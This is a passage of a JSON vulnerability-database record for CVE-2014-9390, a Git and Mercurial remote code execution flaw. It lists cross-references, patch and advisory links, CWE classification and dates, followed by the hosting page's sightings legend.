              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-77335",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-9390",
            "trust": 3.5
          },
          {
            "db": "SECTRACK",
            "id": "1031404",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "71732",
            "trust": 0.4
          },
          {
            "db": "PACKETSTORM",
            "id": "129784",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "129677",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "133704",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "140059",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "129939",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "131193",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-77335",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-9390",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "130744",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "PACKETSTORM",
            "id": "129677"
          },
          {
            "db": "PACKETSTORM",
            "id": "133704"
          },
          {
            "db": "PACKETSTORM",
            "id": "129784"
          },
          {
            "db": "PACKETSTORM",
            "id": "140059"
          },
          {
            "db": "PACKETSTORM",
            "id": "129939"
          },
          {
            "db": "PACKETSTORM",
            "id": "130744"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "id": "VAR-202002-0749",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-07-23T19:27:31.732000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HT204147",
            "trust": 0.8,
            "url": "https://support.apple.com/en-us/ht204147"
          },
          {
            "title": "HT204147",
            "trust": 0.8,
            "url": "https://support.apple.com/ja-jp/ht204147"
          },
          {
            "title": "EGit",
            "trust": 0.8,
            "url": "https://www.eclipse.org/egit/"
          },
          {
            "title": "JGit",
            "trust": 0.8,
            "url": "https://www.eclipse.org/jgit/"
          },
          {
            "title": "Git 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1 and thanking friends in Mercurial land",
            "trust": 0.8,
            "url": "https://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://libgit2.org/"
          },
          {
            "title": "Release Notes",
            "trust": 0.8,
            "url": "http://mercurial.selenic.com/wiki/whatsnew"
          },
          {
            "title": "Git Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108063"
          },
          {
            "title": "Debian CVElist Bug Report Logs: CVE-2014-9390: Errors in handling case-sensitive directories allow for remote code execution on pull",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=3d261960ef416477512c63345482cde6"
          },
          {
            "title": "Ubuntu Security Notice: git vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2470-1"
          },
          {
            "title": "Debian Security Advisories: DSA-3257-1 mercurial -- security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ff84582761ae814b21d648e3e5695a92"
          },
          {
            "title": "Debian CVElist Bug Report Logs: dulwich: CVE-2015-0838: buffer overflow in C implementation of pack apply_delta()",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=924c567b0c5bfcb8fd430e33e12ece5c"
          },
          {
            "title": "Debian CVElist Bug Report Logs: mercurial: CVE-2014-9462: command injection via sshpeer._validaterepo()",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=a8fb7f02161f50bfff0ab70ff4eee61e"
          },
          {
            "title": "Debian CVElist Bug Report Logs: dulwich: CVE-2014-9706: does not prevent to write files in commits with invalid paths to working tree",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d965cc1cf23195b4ff589e7cb23233d5"
          },
          {
            "title": "Apple: Xcode 6.2",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=28f88d65a83ee45368f37221b1b4ea8f"
          },
          {
            "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f"
          },
          {
            "title": "git_osx_installer",
            "trust": 0.1,
            "url": "https://github.com/timcharper/git_osx_installer "
          },
          {
            "title": "CVE-2014-9390",
            "trust": 0.1,
            "url": "https://github.com/mmetince/cve-2014-9390 "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://github.com/blog/1938-git-client-vulnerability-announced"
          },
          {
            "trust": 2.6,
            "url": "https://news.ycombinator.com/item?id=8769667"
          },
          {
            "trust": 1.8,
            "url": "http://article.gmane.org/gmane.linux.kernel/1853266"
          },
          {
            "trust": 1.8,
            "url": "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html"
          },
          {
            "trust": 1.8,
            "url": "http://mercurial.selenic.com/wiki/whatsnew"
          },
          {
            "trust": 1.8,
            "url": "http://securitytracker.com/id?1031404"
          },
          {
            "trust": 1.8,
            "url": "http://support.apple.com/kb/ht204147"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915"
          },
          {
            "trust": 1.8,
            "url": "https://libgit2.org/security/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9390"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9390"
          },
          {
            "trust": 0.3,
            "url": "http://git.or.cz/"
          },
          {
            "trust": 0.2,
            "url": "https://www.apple.com/support/security/pgp/"
          },
          {
            "trust": 0.2,
            "url": "https://developer.apple.com/xcode/downloads/"
          },
          {
            "trust": 0.2,
            "url": "https://support.apple.com/kb/ht1222"
          },
          {
            "trust": 0.2,
            "url": "http://gpgtools.org"
          },
          {
            "trust": 0.2,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.2,
            "url": "https://security.gentoo.org/"
          },
          {
            "trust": 0.2,
            "url": "https://bugs.gentoo.org."
          },
          {
            "trust": 0.2,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9390"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/20.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/timcharper/git_osx_installer"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=36837"
          },
          {
            "trust": 0.1,
            "url": "https://usn.ubuntu.com/2470-1/"
          },
          {
            "trust": 0.1,
            "url": "https://security.gentoo.org/glsa/201509-06"
          },
          {
            "trust": 0.1,
            "url": "http://article.gmane.org/gmane.linux.kernel/1853266\u0027],"
          },
          {
            "trust": 0.1,
            "url": "http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "http://mercurial.selenic.com/wiki/httpcommandprotocol"
          },
          {
            "trust": 0.1,
            "url": "http://selenic.com/hg/file/tip/mercurial/wireproto.py"
          },
          {
            "trust": 0.1,
            "url": "http://mercurial.selenic.com/wiki/whatsnew#mercurial_3.2.3_.282014-12-18.29\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial\u0027],"
          },
          {
            "trust": 0.1,
            "url": "http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e\u0027],"
          },
          {
            "trust": 0.1,
            "url": "http://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://selenic.com/repo/hg-stable/rev/6dad422ecc5a\u0027]"
          },
          {
            "trust": 0.1,
            "url": "http://schacon.github.io/gitbook/7_how_git_stores_objects.html"
          },
          {
            "trust": 0.1,
            "url": "http://schacon.github.io/gitbook/7_browsing_git_objects.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/blog/1938-vulnerability-announced-update-your-git-clients\u0027],"
          },
          {
            "trust": 0.1,
            "url": "http://mercurial.selenic.com/wiki/bundleformat"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3068"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9462"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3069"
          },
          {
            "trust": 0.1,
            "url": "https://security.gentoo.org/glsa/201612-19"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3105"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3069"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3068"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3630"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3105"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3630"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9462"
          },
          {
            "trust": 0.1,
            "url": "https://launchpad.net/ubuntu/+source/git/1:1.9.1-1ubuntu0.1"
          },
          {
            "trust": 0.1,
            "url": "https://launchpad.net/ubuntu/+source/git/1:2.1.0-1ubuntu0.1"
          },
          {
            "trust": 0.1,
            "url": "http://www.ubuntu.com/usn/usn-2470-1"
          },
          {
            "trust": 0.1,
            "url": "https://launchpad.net/ubuntu/+source/git/1:1.7.9.5-1ubuntu0.1"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8108"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3580"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3522"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3528"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "PACKETSTORM",
            "id": "129677"
          },
          {
            "db": "PACKETSTORM",
            "id": "133704"
          },
          {
            "db": "PACKETSTORM",
            "id": "129784"
          },
          {
            "db": "PACKETSTORM",
            "id": "140059"
          },
          {
            "db": "PACKETSTORM",
            "id": "129939"
          },
          {
            "db": "PACKETSTORM",
            "id": "130744"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "PACKETSTORM",
            "id": "129677"
          },
          {
            "db": "PACKETSTORM",
            "id": "133704"
          },
          {
            "db": "PACKETSTORM",
            "id": "129784"
          },
          {
            "db": "PACKETSTORM",
            "id": "140059"
          },
          {
            "db": "PACKETSTORM",
            "id": "129939"
          },
          {
            "db": "PACKETSTORM",
            "id": "130744"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "date": "2020-02-12T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "date": "2014-12-19T00:00:00",
            "db": "BID",
            "id": "71732"
          },
          {
            "date": "2020-03-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "date": "2014-12-20T01:29:10",
            "db": "PACKETSTORM",
            "id": "129677"
          },
          {
            "date": "2015-09-25T06:55:36",
            "db": "PACKETSTORM",
            "id": "133704"
          },
          {
            "date": "2015-01-02T12:02:22",
            "db": "PACKETSTORM",
            "id": "129784"
          },
          {
            "date": "2016-12-07T16:38:00",
            "db": "PACKETSTORM",
            "id": "140059"
          },
          {
            "date": "2015-01-14T03:52:44",
            "db": "PACKETSTORM",
            "id": "129939"
          },
          {
            "date": "2015-03-10T16:22:37",
            "db": "PACKETSTORM",
            "id": "130744"
          },
          {
            "date": "2014-12-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          },
          {
            "date": "2020-02-12T02:15:10.963000",
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-09-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-77335"
          },
          {
            "date": "2021-05-17T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-9390"
          },
          {
            "date": "2015-10-26T16:46:00",
            "db": "BID",
            "id": "71732"
          },
          {
            "date": "2020-03-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "date": "2021-07-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          },
          {
            "date": "2021-05-17T19:54:37.887000",
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "140059"
          },
          {
            "db": "PACKETSTORM",
            "id": "129939"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          }
        ],
        "trust": 0.8
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Remote for multiple products  Git Vulnerability to execute arbitrary command on server",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Input Validation Error",
        "sources": [
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          }
        ],
        "trust": 0.9
      }
    }


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.